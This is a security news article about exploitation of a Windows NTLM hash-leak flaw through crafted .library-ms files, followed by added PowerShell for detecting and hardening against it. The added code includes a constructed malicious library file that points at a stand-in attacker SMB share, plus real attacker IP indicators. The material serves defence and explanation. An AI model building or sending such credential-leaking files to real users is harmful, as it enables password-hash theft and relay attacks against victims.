A Windows vulnerability that exposes NTLM hashes via .library-ms files is now being actively exploited in phishing campaigns targeting government entities and private companies.
The flaw, tracked as CVE-2025-24054, was fixed in Microsoft's March 2025 Patch Tuesday. Initially it was not marked as actively exploited and was assessed as 'less likely' to be.
However, Check Point researchers report having observed active exploitation of CVE-2025-24054 only a few days after patches became available, peaking between March 20 and 25, 2025.
Although one IP address behind these attacks was previously linked to the Russian state-sponsored threat group APT28 ('Fancy Bear'), that alone is not enough evidence for confident attribution.
Exposing NTLM hashes
NTLM (New Technology LAN Manager) is a Microsoft authentication protocol that uses a challenge-response exchange built on password hashes, instead of transmitting plaintext passwords, to authenticate users.
While NTLM avoids sending the password itself, it is no longer considered secure because of weaknesses such as NTLM relay attacks and offline brute-force cracking of captured challenge-responses.
As a result, Microsoft has begun phasing out NTLM authentication in favor of Kerberos, or Negotiate, which prefers Kerberos and falls back to NTLM only when it has to.
In attacks seen by Check Point, phishing emails were sent to entities in Poland and Romania that included a Dropbox link to a ZIP archive containing a .library-ms file.

Source: Check Point
A .library-ms file is a legitimate Windows file type: an XML library description that, when opened, shows a Windows library, a virtual container that aggregates files and folders from several configured locations.
In this phishing attack, the .library-ms file was crafted so that one of those locations is a path to a remote SMB server under the attacker's control.

Source: Check Point
When a ZIP archive containing a .library-ms file is extracted, Windows Explorer processes the file automatically, triggering CVE-2025-24054 and causing Windows to open an SMB connection to the path specified in the file.
When Windows connects to the remote SMB server, it attempts to authenticate with NTLM, handing the attacker the user's NTLM credentials. What is captured is the Net-NTLMv2 challenge-response rather than the raw NT hash; it can be relayed to other services that accept NTLM, or cracked offline to recover the password.
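To make the mechanism concrete, here is an added example (not code from the article, Check Point or Microsoft) of a minimal .library-ms whose only location is an attacker-style UNC path, together with a PowerShell scanner that flags such remote locations in files pulled from a quarantine or download folder. The XML is cut down to the elements that matter; the share host 192.0.2.10 is an RFC 5737 documentation address standing in for the attacker's server, and the function name, the 'C:\Quarantine' folder and the 'fileserver01' allowlist entry are placeholders of mine. The scanner reads the file as plain text and never hands it to the shell, so scanning cannot itself trigger the flaw.

```powershell
# Added example, not from the article or any vendor. Constructed sample of a
# .library-ms (an XML library description) pointing at a remote SMB share.
# 192.0.2.10 is a documentation address used as a placeholder for the attacker's host.
$SampleLibraryMs = @'
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>Documents</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\192.0.2.10\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
'@

function Find-RemoteLibraryLocation {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Path,
        # File servers your own library files legitimately point at
        [string[]] $AllowedHosts = @()
    )
    try {
        # Read as text only: Get-Content never invokes the shell's library handler.
        [xml]$doc = Get-Content -LiteralPath $Path -Raw -ErrorAction Stop
    } catch {
        Write-Warning "$Path is not well-formed XML: $($_.Exception.Message)"
        return
    }
    # Every <url> element, wherever it sits. Benign values look like C:\Users\...
    # or knownfolder:{GUID}; malicious ones like \\host\share or smb://host/share.
    foreach ($node in $doc.GetElementsByTagName('url')) {
        $location   = $node.InnerText.Trim()
        $remoteHost = $null
        if ($location -match '^\\\\([^\\]+)') {                        # UNC path
            $remoteHost = $Matches[1]
        } elseif ($location -match '^[a-z][a-z0-9+.-]*://([^/:]+)') {   # URL scheme
            $remoteHost = $Matches[1]
        }
        if ($remoteHost -and ($AllowedHosts -notcontains $remoteHost)) {
            [pscustomobject]@{
                File       = $Path
                Location   = $location
                RemoteHost = $remoteHost
                Verdict    = 'remote share outside the allowlist: possible NTLM leak'
            }
        }
    }
}

# Write the constructed sample with a neutral extension so that even an unpatched
# host's Explorer never treats it as a library, scan it, then clean up.
$sample = Join-Path ([IO.Path]::GetTempPath()) 'sample-library-ms.xml'
Set-Content -LiteralPath $sample -Value $SampleLibraryMs -Encoding UTF8
Find-RemoteLibraryLocation -Path $sample | Format-List
Remove-Item -LiteralPath $sample

# Triage a whole quarantine folder, tolerating your own file server (placeholder names):
# Get-ChildItem -LiteralPath 'C:\Quarantine' -Filter '*.library-ms' -Recurse |
#     ForEach-Object { Find-RemoteLibraryLocation -Path $_.FullName -AllowedHosts 'fileserver01' }
```

The scanner deliberately matches any `<url>` element rather than only `simpleLocation/url`, so a file padded with unexpected elements still gets flagged; the cost is a false positive for internal file servers, which the allowlist handles.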
In a later campaign, Check Point discovered phishing emails that carried .library-ms attachments without an archive. Simply downloading the .library-ms file was enough to trigger NTLM authentication to the remote server, demonstrating that archives are not required to exploit the flaw.
"On March 25, 2025, Check Point Research discovered a campaign targeting companies around the world, distributing these files without being zipped," explains Check Point.
"According to Microsoft, this exploit is triggered with minimal user interaction with a malicious file, such as selecting (single-clicking), inspecting (right-clicking), or performing any action other than opening or executing the file."
The malicious archive also contains three more files, namely 'xd.url,' 'xd.website,' and 'xd.link,' which leverage older NTLM hash leak flaws and are most likely included for redundancy in case the 'library-ms' method fails.
Check Point says the attacker-controlled SMB servers in this campaign were using the 159.196.128[.]120 and 194.127.179[.]157 IP addresses.
A captured NTLM challenge-response can be relayed or cracked, opening the way to authentication bypass and privilege escalation, so even though CVE-2025-24054 is rated only a "medium" severity issue, its potential consequences are grave.
Given the minimal interaction required to exploit it, organizations should treat this as a high-risk issue: install the March 2025 updates and turn off outbound NTLM authentication wherever it isn't required. Blocking outbound SMB (TCP 445) at the network edge also stops the connection the exploit provokes from ever reaching an attacker's server on the internet.
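As an added example of that hardening (my own script, not from the article or any vendor), the following PowerShell takes a Windows host from "allow all outbound NTLM" (the default) through audit mode to deny, blocks SMB egress, and shows where to look for the audit events. The registry values are the documented backing store for the "Network security: LAN Manager authentication level" and "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policies; in a domain you would push the same settings by GPO rather than editing hosts one at a time. The function names, the rule name and the 'nas01.corp.example' exception are placeholders of mine. Run it in an elevated shell.

```powershell
# Added example, not from the article or any vendor: audit, then deny, outbound NTLM.
$Lsa   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$Msv10 = "$Lsa\MSV1_0"

function Get-NtlmPosture {
    # Snapshot the knobs that matter so before/after can be compared.
    $lsa = Get-ItemProperty -Path $Lsa   -ErrorAction SilentlyContinue
    $msv = Get-ItemProperty -Path $Msv10 -ErrorAction SilentlyContinue
    [pscustomobject]@{
        # 5 = send NTLMv2 only, refuse LM and NTLMv1 (unset means the OS default, 3)
        LmCompatibilityLevel       = $lsa.LmCompatibilityLevel
        # 0 = allow all (default), 1 = audit all, 2 = deny all outbound NTLM
        RestrictSendingNTLMTraffic = $msv.RestrictSendingNTLMTraffic
        # Servers exempted from the restriction
        ClientAllowedNTLMServers   = $msv.ClientAllowedNTLMServers
    }
}

function Set-NtlmRestriction {
    param(
        [Parameter(Mandatory)] [ValidateSet('Allow', 'Audit', 'Deny')] [string] $Mode,
        # Servers that genuinely still need NTLM (a NAS without Kerberos, say), by name
        [string[]] $Exceptions = @()
    )
    $value = @{ Allow = 0; Audit = 1; Deny = 2 }[$Mode]
    if (-not (Test-Path $Msv10)) { New-Item -Path $Msv10 | Out-Null }
    Set-ItemProperty -Path $Lsa   -Name LmCompatibilityLevel       -Value 5      -Type DWord
    Set-ItemProperty -Path $Msv10 -Name RestrictSendingNTLMTraffic -Value $value -Type DWord
    if ($Exceptions.Count -gt 0) {
        Set-ItemProperty -Path $Msv10 -Name ClientAllowedNTLMServers -Value $Exceptions -Type MultiString
    }
}

function Get-OutboundNtlmAuditEvent {
    param([int] $Newest = 50)
    # In Audit mode, every outbound NTLM authentication that Deny would block is
    # written as event 8001 to the NTLM operational log. Review these for a while
    # to learn which exceptions you need before switching to Deny.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-NTLM/Operational'; Id = 8001 } `
                 -MaxEvents $Newest -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Message
}

function Block-SmbEgress {
    # Defence in depth: the SMB connection the exploit provokes should never reach an
    # attacker's server on the internet, whatever the NTLM policy says. The firewall's
    # "Internet" address keyword leaves file servers on private ranges reachable.
    $name = 'Block outbound SMB to Internet'   # placeholder rule name
    if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $name -Direction Outbound -Protocol TCP `
            -RemotePort 445 -RemoteAddress Internet -Action Block -Profile Any | Out-Null
    }
}

Get-NtlmPosture                    # before
Set-NtlmRestriction -Mode Audit    # safe first step: logs, blocks nothing
Block-SmbEgress
Get-NtlmPosture                    # after; restart to be sure the LSA settings are in effect
# Later, once Get-OutboundNtlmAuditEvent shows only servers you expect:
# Set-NtlmRestriction -Mode Deny -Exceptions 'nas01.corp.example'
```

Going straight to Deny is the common mistake: legacy devices and some cross-forest paths still speak only NTLM, and they surface as event 8001 during the audit phase rather than as outages after the switch.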